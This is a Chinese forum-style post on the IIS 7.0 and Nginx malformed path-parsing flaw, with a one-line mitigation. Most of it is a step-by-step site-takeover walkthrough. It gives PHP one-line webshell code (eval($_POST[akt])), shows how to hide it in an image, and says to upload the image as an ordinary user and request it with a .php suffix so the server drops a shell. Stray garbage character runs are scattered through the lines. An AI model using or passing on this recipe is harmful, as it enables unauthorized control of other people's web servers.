IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 L# v& x, [ C; w0 c1 W' Q/ Z
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
7 s' g1 d+ J4 ]8 m__________________________________ 1 m' F& n4 X( M
- z6 o. \$ Z1 A先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
9 n% K, ]( r5 v先合并一张PHP一句话图片马,合并方法: / I3 s( Y+ F$ l
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif & U8 Y9 w8 n0 ^( H' M6 g
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" 7 \5 z. u1 M, N' x2 k
图片随便找一张. / Q7 q5 G8 m# s
一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> 0 @& \# V/ y# n0 V* E: t
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
4 g& }# ^0 D* R2 |找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
0 ^, |7 b5 h* e. v比如假设图片地址为 http://www.political-security.com/tupian/1.jpg# ^3 P7 } a3 d; b8 c0 E3 H. I
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php! v9 Y5 h7 J) E2 x# u
然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
( z+ s& L3 I' zshell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
5 V5 f6 J9 w7 L) `上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
2 Y& y' J) x- F R找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
) k$ x* K v7 s i% ~7 E8 [: c$ N2 L在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。 + b* D3 M t* K3 V: {6 `0 m8 S
剩下的就随便你去搞吧。8 q# f+ X0 ~# \! N, d! G
) ~3 s. F1 u) W# _4 S: l |